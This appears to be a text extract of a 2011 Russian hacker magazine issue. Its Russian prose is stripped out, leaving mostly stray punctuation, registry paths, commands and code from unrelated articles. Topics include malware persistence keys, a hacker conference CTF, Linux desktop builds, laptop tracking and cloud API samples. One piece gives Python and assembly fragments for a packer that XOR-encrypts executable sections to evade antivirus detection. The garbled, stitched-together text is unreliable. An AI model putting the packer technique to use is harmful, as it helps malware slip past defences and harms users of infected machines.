HKEY_CURRENT_USER\
Software\Microsoft\Windows\CurrentVersion\Run\
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\Run\ RunOnce, , . ,
IE,
( ),
X 07 /150/ 2011
,
SENIOR MALWARE ANALYST,
HEURISTIC DETECTION GROUP, KASPERSKY LAB.
.
, -,
,
-
.
, .
, ,
Visual Basic Delphi. Windows
.
,
,
/, .
, ,
,
. , MBR

. , .
: HKEY_CURRENT_USER\Software\
Microsoft\Windows\CurrentVersion\Explorer\Browser
Helper Objects\. HKEY_LOCAL_MACHINE\Software\
Microsoft\Windows NT\CurrentVersion\Winlogon\
Userinit\, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\RunServices\, HKEY_LOCAL_
MACHINE\Software\Microsoft\Windows NT\CurrentVersion\
Winlogon\Notify\.
( exe, ,
dll).
, dll
explorer.exe, ,
Safe Mode.
HKEY_LOCAL_MACHINE\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\_\
069
MALWARE
IE BHO
_ ,
Debugger.
. , , ,
txt-, ,
,
.
.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\policies\Explorer\Run, .
, , - , ,
(
),
, , HiJackThis.
, ,
:
,
.
Windows.
, -, , .
, - ,
. , , ,

. ,
, , ,
, Visa MasterCard .
,
Fraud Antivirus, .
, . , - , ?
, -
070
.
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Policies\System.
DisableRegistryTools.
1, regedit.exe .
DisableRegedit,
HKCU-
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\
System.
DisableTaskMgr HKCU\Software\Microsoft\Windows\
CurrentVersion\Policies\System. ,
. -
. HKEY_CURRENT_USER\
Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer RestrictRun
, RestrictRun,
exe-,
, .

DisallowRun,
.

. ,
DisallowRun RestrictRun.
- ! ,
, HKEY_CLASSES_ROOT\exefile\
shell\open\command.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options. , , .
,
. ,
,
,
.

. -

, , ,
.
.
X 07 /150/ 2011
-
. , ,
,
.
,
Windows. API- CreateWindowEx,
, ,
dwExStyle dwStyle, -
. ,
WS_EX_TOPMOST,

, , dwStyle

.
- ,
WM_CLOSE,
. , .
, WM_MOUSELEAVE ,
, , . ,
.
. , , , .
-. -
,
-
.
, Windows

-
.

. ,
,
.
, ,
, ,
, - . ,
shortcuts ,
.
. , WMI
(
X 07 /150/ 2011
). WMI , , , ,
.
, - , ,
. ,
,
.
.

hosts, %SystemRoot%\system32\
drivers\etc\.

. , yandex.ru ip- , ,
. hosts ,
, .
. ip ,
- Squid, , , - .
IE COM-,
.
DNS- . ,
, DNS-. netsh

, - ,
, WMI.
, route
table. route, API CreateIpForwardEntry.
ip- ,
. ( , ), -
, . hosts
, .

. ,
, , . , IE
BHO. ,
-. ,
-
, ,
,
, .

, . , ,
.
, , .
,
, ,
. z
071
MALWARE
presidentua (http://tutamc.com)
, ,
!
EXE- Python
Web .
, .

. EXE- ,
:).
1.
,
, , . , -
072
,
, ,
PE-, . -
.
X 07 /150/ 2011
HTTP://WWW
links
Olly. , Olly,
XOR
.
! , , ( VirusTotal).

!
. ,
, -
PE-, ,
,
SandBox,
, .
, ,
GitHub,
http://
github.com/presidentua/ExePacker.
,
. ++ VisualBasic,
,
. Python
, . ,
. !
2. PE-
PE- , ,

.
PE- , , ,
. Windowsa
, (,
DLL) ,
Entry Point.
, ,
.
3.
, . X 07 /150/ 2011
pefile

http://github.com/
presidentua/ExePacker

pefile http://code.
google.com/p/pefile/
TornadoWeb
http://www.tornadoweb.org/

PE-,

http://code.google.
com/p/pyew/
pefile
pefile ,
pe.__data__,
pe.__structures__. , . ,
, .
pe.write(filename=result.
exe)
.
- , , ,
.
:
+ .
pe.__structures__.
:).
:), , ,
Putty.exe. :
1.
2.
3.
. .
, ,
.

Putty. .
:
1.
2.
2.1. ,
4.2
2.2.
3.
4.
4.1. ,
2.1
4.2. , 4.1 2.1,

.
DVD
dvd

PE,
.

,

INFO
info
?
Python
Gray Hat
Python.
WARNING
warning
,
.
,
-
:).
073
MALWARE

, ()
, .
, :
, +10;
+30;
Zeus +30;
4 +20;
-10.
,
EXE,
.
, 100, ,
.
4.
- . pefile (
), Putty:
import pefile
pe = pefile.PE("putty.exe")
, print pe,
,
. .
. ,
. - 512
. 1024 :
pe.add_last_section(size=1024)
IDE
1.
, ,
.
.
, , . ,

Windows API. , API.
:
Windows- ;
API
- ;
,
;
, Windows.
PS: ,
. Windows .
. , ,
FASM . pack.tpl.asm
:
XOR 1:
pe.sections[0].xor_data(code=1)
, ? :). ,
++!
, , .
pe.sections[0].
PointerToRawData, ,
pe.sections[-1].PointerToRawData:
pe.data_copy(pe.sections[0].PointerToRawData,
pe.sections[-1].PointerToRawData, 512)
, -
074
use32
mov eax, {{ go }}
jmp eax
, , , ,
TornadoWeb,
,
HTML-. :
asm = Template(open("pack.tpl.asm", "r").read()).generate(
go=pe.OPTIONAL_HEADER.ImageBase +
pe.sections[-1].VirtualAddress+512,
)
with open("pack.asm", "w") as f:
f.write(asm)
X 07 /150/ 2011
PE-
os.system(r"c:\fasmw\FASM.EXE pack.asm")
go ,
, , 512
. FASM.
:
new_pack = open("pack.bin", "rb").read()
pe.data_replace(offset=pe.sections[0].PointerToRawData,
new_data=new_pack)
copy.tpl.asm.
, .
, 512 ,
. .

:
copy_from = pe.OPTIONAL_HEADER.ImageBase+pe.sections[-1].\
VirtualAddress
copy_to = pe.OPTIONAL_HEADER.ImageBase+pe.sections[0].\
VirtualAddress
oep = pe.OPTIONAL_HEADER.ImageBase+pe.OPTIONAL_HEADER.\
AddressOfEntryPoint
asm = Template(open("copy.tpl.asm", "r").read()).generate(
copy_from=copy_from,
copy_to=copy_to,
copy_len=512,
xor_len=pe.sections[0].Misc_VirtualSize,
key_encode=1,
original_oep=oep,
)
,
, :
new_copy = open("copy.bin", "rb").read()
pe.data_replace(offset=pe.sections[-1].\
PointerToRawData+512, new_data=new_copy)
X 07 /150/ 2011
1.

, SandBox . ,
,
,
,
. .
2.

. ,
.
.
,
, ,
, DLL
.
pe.sections[0].Characteristics |=
pefile.SECTION_CHARACTERISTICS["IMAGE_SCN_MEM_WRITE"]
pe.OPTIONAL_HEADER.AddressOfEntryPoint =
pe.sections[0].VirtualAddress
pe.write(filename="result.exe")
5.
, 50 .
50 !
, ?
, , . ,
,
. ,
. ! z
075

c0n Difesa (condifesa@gmail.com, http://defec.ru)
POSITIVE
HACK
DAYS
2011

19
Positive Hack Days 2011, ,
, Positive Technologies.
.
PHD2011
(@devteev)
PT .
, .
phdays.com,
.
-, ,
076
, , :
, , Defcon BlackHat, , ,
HITB.
, , : ,
X 07 /150/ 2011
Capture the flag

,
.
,
PHD2011, , .
, , ,
.
,
.
:
1. -;
2. -;
3. ;
4. .

, . ,
(
) .

CTF. ,
(
PT: bit.ly/fjS0in)
,
, , . , ,
just 4 fun 900 ,
iPhone: , : ,

( 0-day
Safari, X 07 /150/ 2011
) .
, ,
, , , .
.

Positive Technologies ,
,
.
, , PHD2011. (, ) -
. , , - , (
)
.
-
. , .
,
-,
.
, , , ,
:
,

.
DVD
dvd

CTF.
HTTP://WWW
links
,

PHD: phdays.ru .

:
devteev.blogspot.com .

Positive Technologies:
ptsecurity.ru.
077
PHD
. , PwC
,
: - -152 (
). ,
-,
IaaS (Infrastructure as a Service)
.
,
.
, jpeg-, ,
:
. ,
, . , ,
, ,
. , ,

,
,
.
,
The Anonymous
. ,

, , forensic-, , Group-IB, ,
.
, -
078
, ,
PT . . ? ,
-.
,
,
. -,
. ,
,
,
. . ,
. ,
, .

.
. ,
.
. , ,

.
. ,
,
, , .
, , ?. ,
, X 07 /150/ 2011
0day
-
CTF: PPP . ,
, :).

PHD2011, CTF
HackQuest, Positive Technologies .
Lock picking - , .
.
) .
[]: - .
? .
, , PT, .
, .
?
[]: . , ,
[]: , CTF?
. .
[]: -
[]: , CTF ?.
( PT . .),
, ,
[]: PPP -
. .
: ,
[M]: CTF
, -
[]: .
[]:
150 , 50
(Positive Hack Days). ?
[M]: PHD 2011
[]: PHD 2012
non-stop.
?
[]: ,
, , ,
,
CTF, ,
.
[]: :
, ?
[E]: , ,
. just 4 fun, (
X 07 /150/ 2011
Positive Hack Days : ,

,
, . ,
, ,
.
.
, . z
079

Mifrill (mifrill@real.xakep.ru)

, ?
!
, , -,

. ,
,
.
ACM ICPC
:
:
cm.baylor.edu/welcome.icpc

( ACM/ICPC
ICPC) .
, .
70- .
, , ,
. ACM ICPC,
, IT-,
.
(ACM). 1989 , . , Apple, AT&T Microsoft,
1997
IBM.

- 1996-1997,
. :
, . ,
080
, , .
, .
. ,

:). ,
, .
C, C++ Java
. ,
, -
,
..
( ),
.
:
- ICPC $12 000. ,
, $6 000. , , $3 000., ,
$1 500. , IBM
: - ICPC 12 , IBM,
, ,
. , .
Facebook Hacker Cup

:
:
facebook.com/hackercup

(Facebook) X 07 /150/ 2011
ICPC
.
Facebook Hacker Cup.
(2011 ), , .
20 2010
10 2011 . .
: .
, 7 2011 ( 0:00
UTC) 10 2011 ( 0:00 UTC).
, ,
72 . ,
, , 15-16 (3 3
). 1000 .
22 (
15:00 18:00 UTC). 300
( Hacker Cup) 25
. 25
: Facebook $5000
, $2000 , $1000
$100 4- 25-. , , ,
, , ,
Facebook -. , Facebook Hacker Cup , .
Top Coder
:
2528 2011
:
. Top Coder 2011 -, .
:
topcoder.com community.topcoder.com/tco11/
, TopCoder Inc.
( ),
Top Coder Open Top
Coder Collegiate Challenge ( ) . 2007 Top
X 07 /150/ 2011
Coder High School Tournament, .

Top Coder ,
. ,
,
.
TopCoder Inc
Test The Best Codeforces. Top
Coder Open ( Top Coder Invitational). ,
- . ,
, , ,
, 18 .
Top Coder 300 000 .
TopCoder c 2001
: Algorithm, Design, Development,
Marathon, Architecture, Assembly, Testing, Bug Races Studio.
Top Coder Open 2011 $150 000
100 - ( , ). Algorithm,
$15 000. ,
,
.
,
,
.
Google Code Jam

:
6 29 2011
:
. , 2011 Google
:
code.google.com/codejam
,
Google Code Jam. , -
081
ICPC
TopCoder Open

25 Facebook Hacker Cup 2011

Google, 2003 .
Google Code Jam ,
Google. -,
, IT-, ,
. :
,
. , , Google
Code Jam .
, Google-,

. , .
Google Facebook Hacker Cup:
$10 000, $2000,
$1000. 4 25
$100.
Google AI Challenge
Google Code Jam

2009
PlanetWars, Google AI
Challenge
C#, Java, Python, C++, Scala, PHP, Lisp, Haskell, OCaml,
CoffeeScript . , . 4600 112
. Google AI Challenge ,
, , , .
FAQ : .
. ,
:).
CodeCup
:
:
codecup.nl
:
ai-contest.com
Google ( )
. ,
. Galcon
. , -, : ,

. ,
.
. (
), . ,
, .

082
Google AI
Challenge. ,
Dvonn. , Google AI Challenge,
24/7 3 . ,
codecup.nl ( CodeCup
2011 , 2012 ).
, .
Linux,
-.
. 1.4 .
Pascal, C, C++, Java, Python, Haskell, Javascript
( ). ,
-, , ,
.
X 07 /150/ 2011
Facebook Hacker Cup
ICFPC
:
:
icfpcontest.org
. ICFP Contest , 1998 .
. ICFP (
) - ,
.
,

,

. , 72 (
). : lightning round ( , 24 ) main
round ( ).
(
Haskell, Objective Caml, C++, Cilk Java), . ICFPC
,
, .
AppUp Developer Challenge Intel

:
21
:
software.intel.com/ru-ru/articles/iadp-challenge-3
AppUp Developer Challenge ,
,
Intel Atom. 350
,
:
$60 .
, Alchemy
X 07 /150/ 2011
Facebook Hacker Cup

Top Coder Open

Classic. ,
Home Innovation Project AR Home.
$8 . , , : ,
. ,
, , ,
, .
, -
:
, MeeGo,
/
. ,
, :
, 700- ,
50
:). :
TED, ,
,
Comic-Con . z
083
UNIXOID
grinder (grinder@tux.in.ua)
KDE4
GNOME3
KDE GNOME , ,
. ,
, : , , . .

.
, KDE
SC 4.6.2, Ubuntu 10.10
4.5.1.
openSUSE 11.4, Gentoo Linux, FreeBSD, OpenBSD ..
, , .
, .
084
,
. : ,
,
, . ,
. , KDE GNOME.
Linux Mint 10 GNOME.
.
, .
,
X 07 /150/ 2011
KDE Ubuntu
Ubuntu KDE, ,
kubuntu-ppa/backports:
$ sudo add-apt-repository ppa:kubuntu-ppa/
backports
$ sudo apt-get update
$ sudo apt-get install kubuntu-desktop
. , , /home.

sudo. admin ( Linux Mint).
.
~/.build-config,
(clck.ru/BZTg) ~/.bashrc. ,
. , 64- :
export LIB_SUFFIX=64
kdesdk, alias
make=makeobj. ,
PyKDE4 DBUS.
function cmakekde,
cmake. ,
:
cmake $KDE_BUILD
\ -DCMAKE_INSTALL_PREFIX=$KDEDIR
\ -DCMAKE_BUILD_TYPE=debugfull
\ -DKDE4_BUILD_TESTS=TRUE
nice make -j2
make install
'-j' (X+1), CPU.

KDE ,
$KDEDIR.
kdesrc-build (kdesrc-bld.kde.org) build-tool.
KDE . ,
,
~/.kdesrc-buildrc. , .
$ cp ~/kdesrc-build-1.13/kdesrc-buildrc-sample \
~/.kdesrc-buildrc
.
, . ,
:
kde-languages ru
:
module <module-name>
end module
:
$ sudo ./kdesrc-buildrc
X 07 /150/ 2011
, , , .
, ,
, '--no-svn'.
'--pretend', . , , '--refresh-build'
,
. kdesrc-build Perl libwww. , .
, qt-copy, kdesupport, kdelibs, kdepimlibs, kdebase
7 , 20
.
.
KDE,
.
~/kde. ~/kde/src , ~/kde/
build . , cs cb,
.
kubuntu-ppa/backports, :
$ sudo apt-get install apt-build

.
$ sudo apt-build install kubuntu-desktop
, /etc/
apt/apt-build.conf. , ,
,
. apt
, , :
$ sudo apt-get source kubuntu-desktop
$ sudo apt-get build-dep kubuntu-desktop
, ,
. , buildessential, cmake, doxygen, . ,
, - . ,
libxine-dev, KDE
. Git (quickgit.kde.
org) (ftp.kde.org/pub/kde). SVN,
. :
085
UNIXOID

apt-build
$ nano ~/.gitconfig
[url "git://anongit.kde.org/"]
insteadOf = kde:
[url "git@git.kde.org:"]
pushInsteadOf = kde:
. , , :
$ git clone kde:kdelibs
$ git clone kde:kde-workspace
$ git clone kde:kdepimlibs
, kdemultimedia,
kdeartwork, extragear .
Qt. .
KDE', , KDE,
..
$ git clone kde:qt-kde
Gitorious, Qt :
// Qt
$ git clone git://gitorious.org/qt/qt.git
//
$ git clone \
git://gitorious.org/+kde-developers/qt/kde-qt.git
~/.bashrc ~/.build-config,
, :
$ sudo cmakekde
,
:
cmake

, , , . , , , ,
. , add_subdirectory() add_
optional_subdirectory() CMakesLists.txt
.
, ,
. ,
,
, .
strigi nepomuk,
kdepim-. , KWin OpenGL .
Akonadi 20%
. , KDE3, .
raster trace qt-gui,
, , 30 .
: USE- (gentoo.org/dyn/use-index.xml) ,
. ,
Gentoo XZ-, KDE4
200 (1,8 2 ). ,
. , kwin
openbox- .
Antico, Qt4/X11
+ ( KDE+KWin). kdelibs,
. , KDE. 0.2
. Antico Git:
$ git clone git://github.com/antico/antico.git
cd $KDE_BUILD
for dir in
kdelibs
kdepimlibs
... ..
;
do cd $KDE_BUILD/$dir; cmakekde 2> /dev/stdout; done
KDE cmake, ./configure,

, .
cmake
CMakesLists.txt *.cmake.
.
086
GDM KDM, /usr/

sbin/kdm /etc/X11/default-display-manager.
~/.xsession ~/.xinitrc startkde . , Debian,
/etc/alternatives.
x-window-manager ,
x-session-manager . /usr/share/xsessions/
kde4.desktop :
$ sudo nano /usr/share/xsessions/kde4.desktop
Exec=$HOME/kde/bin/startkde
X 07 /150/ 2011
~/.jhbuildrc. , .
$ cp examples/sample.jhbuildrc ~/.jhbuildrc
, ,
, , .
live.
gnome.org/Jhbuild/Modulesets. ,
, ,
. :
JHBuild
TryExec=$HOME/kde/bin/startkde
Name=KDE4
GNOME3
, , , ,
. GNOME
3.2.
,
Live-: openSUSE Fedora (gnome3.org/tryit.
html).
openSUSE 11.4, Ubuntu 11.04 Natty Narwhal Fedora 15.
, ,
Linux Mint, PPA- GNOME 3 Stack.
, Gtk+ 3.
$ sudo add-apt-repository ppa:ubuntu-desktop/gnome3-builds
$ sudo apt-get update
$ sudo apt-get install gnome3-session
$ nano ~/.jhbuildrc
repos['git.gnome.org'] = 'ssh://user@git.gnome.org/git/'
moduleset = 'gnome-suites-core-3.0'
modules = [ 'meta-gnome-desktop' ]
checkoutroot = os.path.expanduser('~/checkout/gnome')
prefix = '/opt/gnome'
# CFLAGS
# os.environ['CFLAGS'] = '-Wall -g -O0'
#
'--disable-static --disable-gtk-doc'
#autogenargs=''
makeargs = '-j2'
:
$ jhbuild sanitycheck
, . :
jhbuild ,
, ,
, jhbuild sanitycheck.
live.gnome.org/JhbuildDependencies ( : m4, Perl, Python GCC).
, ,
.

bootstrap:
$ gnome-shell --replace
, GNOME3.
, , Linux Mint .
APT .
Git- (git.gnome.org) FTP- (ftp.
gnome.org/pub/GNOME).
GNOME
Python JHBuild (developer.gnome.org/jhbuild).
Git ( gnome-common):
$
$
$
$
git clone git://git.gnome.org/jhbuild

cd jhbuild
make -f Makefile.plain
make -f Makefile.plain install
JHBuild , PATH ~/.local/bin.

$ echo PATH=$PATH:~/.local/bin >> ~/.bashrc
X 07 /150/ 2011
$ jhbuild bootstrap
sanitycheck , ,
:
$ jhbuild build
JHBuild ,
~/.jhbuildrc . ,
, ,
(, , ..).
JHBuild
:
$ jhbuild build gtk+
, KDE4 GNOME3
. ( ) , . ,
, . z
087
UNIXOID
(execbit.ru)
Must have-

,
,
.
?
, :
1.
, . , - , ,
.
2. , ,
.
3. ,
, , .
, ,
.
4. : ( ) ,
088
, ,
. , -
.
5. , - ,
- .
,
, Linux, -,
. . ,
.
,
. ,
.

X 07 /150/ 2011
, encfs
.
, . , , .
,
rsync, sp git,
, ,
(
).
, .
Dropbox,
,
, .
, .
Dropbox ,
, ,
(
delta-, ).
Dropbox . -,
,

( Dropbox ,

, ),
-,
(2 ), .
,
Unison,
Dropbox,
(GTK CLI), ,
,
.

SSH- ()
IP-,
. ,
. Unison :
( default),
.
,
(SSH), .
,
.
Go.
Unison
, cron:
$ echo "*/10 * * * * /usr/bin/unison -auto -batch"
| crontab -
, . ,
, , .
,
. ,
, . :
gsynaptics
INFO
info
ArchLinux

webfs
:
$ yaourt -S quickserve
$ quickserve \
///

:
$ cd ///
$ python -m \
SimpleHTTPServer

:
$ synclient
TouchpadOff=1
$ sudo apt-get install unison

(). :
$ unison-gtk2
X 07 /150/ 2011
089
UNIXOID
Prey?
Windows
Prey :
, , (
) ,
, . ,

. Ethernet
Linux
DHCP ( ,
). WiFi :
,
,
.
, c
.

.

,
( , ).
,
Windows.
Linux, , ,
Prey .
dual-boot, Windows
, Prey (,
Prey ,
Android).
, ,
, ,
.
, ,
,
,
.
: ( )
(
, )
. ? :
:
1) encfs, (,
TrueCrypt dm-crypt, );
2) Prey, , web- ..
encfs. ,
:
$ sudo apt-get install encfs
, . ~/.crypto:
$ mkdir ~/.crypto
/
. ~/decrypto:
$ mkdir ~/decrypto
encfs:
$ encfs ~/.crypto ~/decrypto
p. . , decrypto,
, ~/crypto.
.
:
$ fusermount -u ~/decrypto
$ ls -l ~/.crypto ~/decrypto
decrypto ,
. , , web-:
090
$ mv ~/.config/chromium ~/decrypto
$ ln -s ~/decrypto/chromium ~/.config/chromium
, , encfs , .
, encfs
pam_mount ,
, .
, ,
. :
$ vi ~/bin/encfsmount.sh
#!/bin/sh
ENC=/home/vasya/.crypto
DEC=/home/vasya/decrypto
if [ 'grep encfs /proc/mounts | grep $MNT)' != "" ];
then
zenity --title="encfs" --question --text=" encfs?"
if [ $? == 0 ]
then
fusermount -u $DEC &
fi
else
zenity --entry --hide-text --title="encfs" \
--text="?" | encfs -S $ENC $DEC
fi
(chmod +x ~/bin/encfs_mount.sh)
.
~/.config/autostart,
. Prey.
, , , e-mail. ,
, WiFi
GPS-, , , traceroute, ,
, web-. ,
,
: , , , , ,
, ,
. ,
(preyproject.com) Linux-.
0.5.3.
/usr/share:
X 07 /150/ 2011
Prey
$ cd /usr/share
$ sudo unzip ~/prey-0.5.3-linux.zip
, web-,
Prey ,
control.preyproject.com, , Add
new device, ,
Information to gather ( ). Device information,
,
Prey, .
/usr/share/prey/config :
device_key=''
Account , API Key, :

api_key=''
Prey , ,
:
$ sh prey.sh --check
, . ,
, Prey ,

(, , ).
Prey cron, 10
:
keytouch
$ sudo su
$ echo "*/10 * * * * /usr/share/prey/prey.sh > /var/log/prey.
log" | crontab -
,
Missing
YES. Prey .
,
New report!.
Prey
( ,
), , ,
Prey , ,
X 07 /150/ 2011
091
UNIXOID
web- Linux
:
$ mplayer tv://
s:
$ mplayer tv:// -vf screenshot
:
$ mencoder tv:// -ovc lavc -o webcam.avi
slim ,
/etc/slim.conf:
, Prey,
10
e-mail. , ,
web-, /
Prey
(, laptop_missed.
html site.com, Prey, ,
e-mail).
,
:
$ sudo vi /usr/share/prey/config
#
check_url='http://site.com/laptop_missed.html'
#
missing_status_code='200'
# e-mail
post_method='email'
#
mail_to='vasya@gmail.com'
smtp_server='smtp.gmail.com:587'
smtp_username='vasya@gmail.com'
smtp_password=''
: ,
-
( Ethernet- WiFi).
, gdm (Gnome)
kdm (KDE). gdm /etc/gdm/custom.conf
:
$ sudo vi /etc/gdm/custom.conf
[daemon]
TimedLoginEnable=true
AutomaticLoginEnable=false
TimedLogin=vasya
AutomaticLogin=vasya
TimedLoginDelay=5
DefaultSession=gnome
kdm /usr/local/share/config/kdm/kdmrc
:
$ sudo vi /usr/local/share/config/kdm/kdmrc
NoPassUsers=vasya
DefaultUser=vasya
AutoLoginUser=vasya
092
$ sudo vi /etc/slim.conf
default_user vasya
auto_login yes

, .
, .
Linux SMB-
(Samba), Windows-.
, , ,
- FreeBSD,
.
FTP HTTP. ,
FTP,
ftp-:
$ sudo apt-get install vsftpd
/home/ftp (
pub, ).
web-:
$ sudo apt-get install webfs
$ webfsd -p 8080 -r ///
http://IP-:8080.
, - .

.
, , .
xmodmap, .
keytouch
(keytouch.sf.net),
.
,
:
$ sudo apt-get install keytouch

/. , ,
( ).
X 07 /150/ 2011
Dropbox, Unison
, . :
synaptics,
Linux
gsynaptics ( ,
synclient,
X.org).
$ sudo apt-get install gsynaptics
.
.
,
.
,
.
,
powertop, , .
:
$ sudo apt-get install powertop
$ sudo powertop
, top- .
X 07 /150/ 2011
,
.
, .
, , ( ,
).
(WiFi-, )
.
jupiter,
,
.
, :
$ sudo apt-get install jupiter
. ,
,
:
.
( ) WiFi.
.
/ .
,
, . ,
. z
093
UNIXOID
Adept (adeptg@gmail.com)
LibreOffice
Mageia
Linux Mint
OpenSource. ,
, , , - .
.

LibreOffice . , ,
OpenOffice Sun. : , ,
, Sun
upstream.
, .
( , , Novell)
OOo, . Go-OO
VBA-,
Microsoft OOXML, .
(SUSE, Debian, Ubuntu )
094
Go-OO. ,
Go-OO ,
,
OpenOffice.
, OpenOffice Sun .
, Oracle Sun.
, . Oracle
,
,
Document Foundation. -
(
). Document Foundation
, FSF,
OASIS, GNOME Foundation, Google, Novell, Red Hat, Canonical
( 2011 39 goo.gl/
X 07 /150/ 2011
Mageia
LibreOffice Writer OpenOffice Writer

LibreOffice
UqGHN). Oracle
,
OpenOffice.org.
Oracle ,
Document Foundation OpenOffice.org.
, LibreOffice.
.
Document Foundation
(28 2010 ) -
LibreOffice 3.3.0 ( OOo), , ,
Go-OO. : wiki, IRC, ( 13
, ). - 80000 . 45 ( 25 ).
, IRC- 100 ,
14000.
,
. Twitter .

, 20 fulltime (Red Hat,
Novell, Canonical).
5 2011
1,3 .
3.3 Document Foundation
,
. (50000 )
8 !
LibreOffice 3.3 OpenOffice.org
3.3 ( ,
,
,
Calc 65000 1 ), :
SVG;

X 07 /150/ 2011
(Writer);

(, <F5>),
,
;
MS Works Lotus
Word Pro, WordPerfect;
, (, ),
.
LibreOffice () ;

: Calc A1, Excel A1 Excel R1C1;
ODS, Excel DBF; Excel,
pptx.
LibreOffice 3.3
OpenOffice : Ubuntu 11.04,
Fedora 15, openSUSE 11.4, Mandriva 2011. LibreOffice
Google Summer of Code 2011
( ,
, Visio-).
HTTP://WWW
links
goo.gl/AWH2p
Document
Foundation
goo.gl/DT6z8
changelog
LibreOffice 3.3
goo.gl/9RhuB

LibreOffice Google
Summer of Code 2011
goo.gl/8Gkft
Icinga
Nagios
OpenSource , -
. , ,
.
, .
mplayer (, ,
10 ). mplayerxp,
( , mplayer

). mplayerww Windows-only, ,
PMP (PlayStation Portable),
DSP- winamp
.
mplayer2.
,
:
. mplayer
.
mplayer2 ;
095
UNIXOID
, , :
.
.
Gosa FusionDirectory. Gosa
- LDAP
, , ,
. : Gosa ,
, GONICUS GmbH,
(, )
.
Redmine
.
ChiliProject, 2011 .
( ,
upstream) ,
ChiliProject community. ,
.
Hudson
Sun, Oracle.
2010 (java.net)

( ).
, github,
Jenkins ( Oracle
Hudson). , Oracle
Hudson ,
Eclipse Foundation.
Enterprise- OpenSource . , Nagios,
Icinga.
Nagios Enterprises.
Icinga
, :
- C
, PHP Ajax;
.
( LDAP);
IPv6,
IPv6/IPv4-;
API (XML, JSON, SOAP);
-.
Icinga
Nagios.
.
FPS Nexuiz. (Lee Vermeulen), ,

Illfonic. (
GPL)
.
Xonotic.
,
.
Firefox 2 .
Mozilla Application Suite ;
X.Org XFree86, , , -
;
Ubuntu Debian, 1
;
OpenBSD BSD. ,
NetBSD, 1995 -
;
Joomla CMS,
- CMS Mambo.
Matroska;
;
Nvidia VDPAU,
GPU;
FFmpeg,
FFmpeg API;
mencoder ( ,
, ).
- , ,

mplayer2;
GUI-.
- 2.0,
mplayer. ,
,
,

.
GUI mplayer .
UMPlayer, SMPlayer. 1.0, ,
,
. ,
Windows Linux, Mac OS X. :
CSS.
;
, Youtube;
SHOUTcast-;
opensubtitles.org.
.
, . .
, FFmpeg
. ,
git,
,
. ,
, ,
, , , . , .
,
. Libav.

.
096
,
/.
Mandriva 30
. ,
X 07 /150/ 2011
ChiliProject
UMPlayer
Ubuntu KDE 3.5

Linux Mint
Mageia, . Mandriva 2010.1:
, OpenOffice
LibreOffice.
, ,
:
( 10000 ),
(, wiki), , , , IRC-
. , . . , Mandriva Mandriva 2011,
. , -
.
Android
IcedRobot,
. Dalvik Virtual Machine
( Java, Android) OpenJDK
( Java, GPL),
.
Dalvik ,
Android .
, Dalvik
OpenJDK. :
Android- ,
OpenJDK;
OpenJDK ( ,
).
.
- Debian,
Ubuntu,
.
Ubuntu
Linux Mint,
X 07 /150/ 2011
Ubuntu ( , distrowatch.com
). ,
11 ( Katya),
Ubuntu 11.04 Unity ( Gnome 2.32), (
flashplayer, unrar) ( DVD-),
:
mintMenu GNOME;
mintInstall ,
Ubuntu;
mintUpdate ;
mintBackup .
, DE , . ,
.
.
KDE 3.5. KDE4 KDE
. 3.5, Trinity Desktop Environment.
, , : , Qt4 HAL udev. (www.trinitydesktop.org)
Debian/Ubuntu, RPM-
RedHat/Fedora OpenSUSE .
To fork or not to fork
. ,
, , .
, , X.Org, 2004
XFree86 - .
. GCC. 1997
EGCS, . ,
GCC EGCS. z
097
CODING
(antonov.igor.khv@gmail.com, http://vr-online.ru)

Dropbox, VK, Flikr Facebook

, , Facebook -
. ? ?
,
. ? ? .
?
.
. ,
. ,
?, . ,
, . ,
..
. ,
. . ,
,
. -
098
( )

. . .
,
, . .
www.vr-online.ru , Twitter .

. , . ?! , .
, .
.
.
X 07 /150/ 2011
1. DropBox
DROPBOX
// DropBox.DropBoxCredentials
// ,
// DropBox
DropBox.DropBoxCredentials myCredentials = new AppLimit.
CloudComputing.SharpBox.DropBox.DropBoxCredentials();
// ,
myCredentials.ConsumerKey = "kxsdqll7p11dtcy";
// ,
myCredentials.ConsumerSecret = "dhw5dvlrmxw62oe";
//
// ( )
myCredentials.UserName = "anton@gmail.com";
myCredentials.Password = "13241414";
// DP
DropBox.DropBoxConfiguration myConfiguration =
DropBox.DropBoxConfiguration.GetStandardConfiguration();
2. Facebook C# SDK CodePlex
AUTH
using TweetSharp;
TwitterService tws =
new TwitterService("_", "_");
//
OAuthRequestToken reqToken =
tws.GetRequestToken();
// url oAuth
Uri uri = tws.GetAuthorizationUri(reqToken);
Process.Start(uri.ToString());
//
string verifier = "123456"; //
OAuthAccessToken access =
service.GetAccessToken(requestToken, verifier);
//
service.AuthenticateWith(access.Token, access.
TokenSecret);
CloudStorage myStorage = new CloudStorage();

// ,
//
if (!myStorage.Open(myConfiguration, myCredentials))
{
MsgBox(" !");
return;
}
// ok, /
myStorage.UploadFile("article_for_x.txt",
"/MyPublicDirectory");
myStorage.DownloadFile("/MyPubarticle_for_x.txt ",
"C:\\");
//
//
//
if
{
,
(myStorage.IsOpened)
myStorage.Close();
web-. www.vr-online.ru.
.
. ,
, .
,
( ).
X 07 /150/ 2011
IEnumerable<TwitterStatus> mentions =
service.ListTweetsMentioningMe();
,
.
. ,

. ,
.

. , ,
. .
. ,
ICQ- (,
?). ,
, FB ..
,
( ). ,
.
, . ,
. ,
.
, .
-
099
CODING
3.
Facebook
Developer Toolkit
. ,
web-.
, ,
. . ,

. ,
. ,
. , , , .
.
.
, . . , , API? ,
.
. , ,
.
,
, .
, ? ! -,
, . , . , -.
,
.
. , , .

DropBox (dropbox.com). ,
DropBox, . DropBox ,
.
DropBox , . .
, DropBox
. , 2
100
. ?!
? , ,
, , DropBox
.
.
,
. ,
. , . ,
DropBox ,
. , API, .
C#, SharpBox
(sharpbox.codeplex.com). ,
DropBox .

DropBox. , 31 2010
.
, .
,
, .
, DropBox,
(https://www.dropbox.com/developers/
apps). application AppKey
AppSecret. ,
. , , VS, SharpBox
, . DropBox
.
